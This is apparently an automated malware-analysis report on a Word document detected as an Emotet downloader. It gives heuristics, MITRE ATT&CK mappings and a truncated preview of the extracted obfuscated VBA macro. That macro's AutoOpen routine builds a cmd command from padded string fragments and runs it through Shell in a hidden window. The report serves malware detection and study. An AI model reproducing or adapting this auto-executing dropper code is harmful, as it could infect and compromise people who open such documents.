MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6802950-0', indicating a downloader functionality. The presence of an AutoOpen VBA macro, specifically flagged by 'OLE_VBA_AUTOOPEN' and 'OLE_LEGACY_WORDBASIC_AUTOEXEC', strongly suggests that the macro is designed to execute automatically upon opening the document. The script attempts to construct a command string and execute it using the Shell function, likely to download and run a secondary payload. This aligns with the typical behavior of Emotet droppers.
Heuristics 5
-
ClamAV: Doc.Downloader.Emotet-6802950-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6802950-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 36138 bytes |
SHA-256: 42f9a67e0e0b4589107a8d64283fd44155d09c641880ecea255d594515f30ffa |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "amFAQmi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
RRDjV = supwE
zdIfhH = 560
ELCdwh = CDbl(7939)
imWiSZUu = "" + jvRYMaoDi + UAkEUfiQVMIiq + CVar("cm") + jTOPkwGDhHS + SFmPslP + bUQuDDOS + RjkcPT + EknRr + YiIbKFwva + AGKuBJC + fqwiqi + fPjGcv + JTWRbmMu + LAvwOopqIQ + iIJMfXwwTa + IiFHUTcDob + dwjJGmo + XjMHGtaQ + AnPXP + czaNXkWuokO + TdnFSFjnwt + fEwfkwjzE + uMScbLVJHS + nioRpLuuw + oUzuI + ZAwJRHd + QRozVm + PFizuVCUbA + XRCzhsm + YAwGf + ZwTKMQ + rwmAUNL + PdkGHTjdCrU + XfOfPVuS + iYhhlsbi + MjrdpLttWTz + zRzuQ + iuwmpik + iMmHOwG + nwaUTIpnsB + spHJJ + vKFhwiC + tqNPAMuzBrr + EMhvZcA + NFpRsij + lDiqIdSjU + jiHKqINjAz + HrlwItq + svJrLupG + sfaRhOQGqHL + wPiSNiMcI + bmjtUoTct + CzBibwPatmFWfo
NGzZC = qqKSY
vQrBAq = Int(98)
Shell@ imWiSZUu, 0
BARbh = ChrW(WQEFEk)
End Sub
Attribute VB_Name = "uouvHKXJZi"
Function bUQuDDOS()
On Error Resume Next
XtujJC = zCsTWa
XzqnCr = 3
rirYlTAo = "d" + " "
KJrUQa = FAYNS
VapUcn = " " + " /" + "c " + " " + "FO"
zGXYzS = "R /" + "F " + CStr(Chr(SUlXQMDh + jvpZWkmTYzivj + 34 + rDVmqSiEwa + ShTShfdcHzt)) + "token" + "s=2" + " delims=" + "P=Mf" + CStr(Chr(ZwjVcWosD + huwZzrsw + 34 + TmFfzPCP + JiTRVziTEGjPH)) + " %d I" + "N ("
wHqpMXoK = "'assoc.cmd" + "')" + "DO " + "%d /V:" + " /r"
ptuTIuU = " " + CStr(Chr(mjEiPGuPLFJd + HldqjADafDw + 34 + uVYDfvuKjw + lOPILMVsowUGYa)) + " s" + "et " + " +" + "$="
oAbwZz = Sin(20930 * jcYOW + 3199 / QUEBkB)
otXCC = VCdfY
CBGLdC = Fix(HpMvYr)
iFZVbkLSYT = "//-/-\_/\" + "_-\__\ -/_"
poaEn = EBwINL
EUorfa = FnQFFv
iAVjORf = "-\-/\_-\" + "_\// " + "/_-//\" + "/-\\__-_" + "\ /\-_\" + "-"
zRWZQk = Atn(841)
UUELD = "_/\\_/_/- " + "/--\" + "/\_"
Mthnqz = CSng(ZEzSsj)
KdjGG = 2650
QLlTBRTkmdr = "/-\_\_/_" + " _\_--/\\" + "/-//\__ \"
bUQuDDOS = rirYlTAo + VapUcn + zGXYzS + wHqpMXoK + ptuTIuU + iFZVbkLSYT + iAVjORf + UUELD + QLlTBRTkmdr
jcvEu = DwuzM
KDTnj = ChrB(878)
End Function
Function RjkcPT()
On Error Resume Next
HszmwV = 46
EUZEEAXZHBT = "___/\//\_" + "-\--/ --_/"
utlOA = YtWRw
JCvUY = Log(nJNpi)
iKzDMifCavj = "\/-_\" + "_\/" + "_\- \_-\\_"
wkdqsTHR = "\/-" + "_-/-/_ _" + "-\_\-" + "_//_\/" + "/\- _/-_-" + "/\\_-"
TMMVpq = "\/\_- \_-_" + "\-/\_\" + "//--/ _" + "_" + "__\-/" + "/" + "\\/\--"
GpzLju = Round(wGAhUO)
mlwCVr = Haonf
TBmBu = HmBwq
zEUjCbRBti = "- \/\--_" + "_/-_/\/-" + "_ -_" + "-/\-" + "/_/-\\__\" + " _\_-" + "-\/_//"
mYVGRD = Rnd(GNWHM)
vdXYcdE = "-\-_/" + " /" + "\\-"
WvOrp = 5989
jfZjz = AnJDm
CrsRShk = "/\\_/--/-" + "__ --/-" + "\" + "-_\" + "__/" + "/_\\}"
uirQuoRCF = "\_-_///-__"
HGYJa = Log(kLCfUw)
IQXzn = 98
zIbYP = lfNiHG
wDQjzROS = "-\/\-}-\/" + "/_-_/\-/" + "\\-_{\/_//" + "_-\_\"
RjkcPT = EUZEEAXZHBT + iKzDMifCavj + wkdqsTHR + TMMVpq + zEUjCbRBti + vdXYcdE + CrsRShk + uirQuoRCF + wDQjzROS
zHjlP = CLng(813)
End Function
Function EknRr()
On Error Resume Next
JaijVRl = "-" + "-\_/h"
ibDNo = 5060
MCjpBbvpAi = "/\_-"
obZoFw = 141
UdptDwCiHD = "-\-//" + "_-_\/_c/--" + "/__-/\\\-_" + "/\t/_/-" + "_-"
OiAsvW = 307123685
TXzHJT = ChrB(ckJQZo)
tMhwzqnZGB = "\" + "_\/_\--/a/" + "_-\\/_" + "--\/" + "-\/_c\-" + "/"
qwUIPkqkNG = "\_" + "_-///" + "__\\-}" + "_"
EknRr = JaijVRl + MCjpBbvpAi + UdptDwCiHD + tMhwzqnZGB + qwUIPkqkNG
VIclD = CGzEwZ
rJLVrR = CDbl(DTrvj)
End Function
Function YiIbKFwva()
On Error Resume Next
UXpYA = CByte(AHEkT)
CktfQ = "_" + "/\_\-_\/" + "\--//" + ";\" + "\--_/"
XAkqp = CdDJOR
zbsPN = ChrB(59579 * TlaAuk - GZSqE / wUFLwA)
wRHFJwn = "/-_-_\/" + "/_k/-\_-\"
RMJivk = 2
EkHdV = CSng(16838 / nRwipo + 86246 * fAsiH)
PXGfpA = RdDUIc
fFBaP = "___/--//"
AaOBv = 7
ZIWsBH = 19
BCcVYIN = "\a-" + "_--///\" + "-\" + "\/__\e\" + "-\"
sYsiiC = iWisi
JBQDL = CBool
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.